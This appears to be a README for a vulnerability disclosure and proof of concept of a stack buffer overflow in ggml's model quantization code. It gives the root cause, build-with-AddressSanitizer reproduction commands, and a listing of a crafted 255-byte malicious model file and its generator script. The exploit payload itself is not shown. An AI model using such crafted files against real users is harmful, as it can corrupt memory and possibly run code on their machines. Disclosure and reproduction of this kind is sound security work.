File size: 1,698 Bytes
b8bfb10 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | # GGML common-ggml.cpp — Stack Buffer Overflow (CWE-121)
A crafted 255-byte model file causes a stack buffer overflow in `gpt-2-quantize` / `gpt-j-quantize` with attacker-controlled data, enabling potential code execution.
## Vulnerability
**File:** `examples/common-ggml.cpp:113-116` in `ggml_common_quantize_0()`
**Root Cause:** `n_dims` is read from the model file with no bounds check, then used to index `int32_t ne[4]`. Setting `n_dims > 4` writes attacker-controlled data past the 16-byte stack array.
## Reproduction
```bash
# Generate the malicious model file
python3 gen_stack_overflow_v2.py
# Build ggml with AddressSanitizer
git clone https://github.com/ggerganov/ggml && cd ggml
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address"
make -j4 gpt-2-quantize
# Trigger crash
./bin/gpt-2-quantize malicious_gpt2_v2.bin output.bin q4_0
# Result: Segmentation fault (without ASan) / ASan: stack-buffer-overflow (with ASan)
```
## Files
| File | Description |
|---|---|
| `malicious_gpt2_v2.bin` | 255-byte malicious GPT-2 model file (n_dims=32) |
| `gen_stack_overflow_v2.py` | Python generator script |
## Impact
Stack buffer overflow with attacker-controlled data. Overwrites saved registers, return address, and adjacent stack variables in `ggml_common_quantize_0()`. Potential for arbitrary code execution when a user quantizes a malicious model file.
## Tested Version
ggml 0.11.0 (commit ac6f7b44f60fde0091f0b3d99afde48f8c99b13a)
|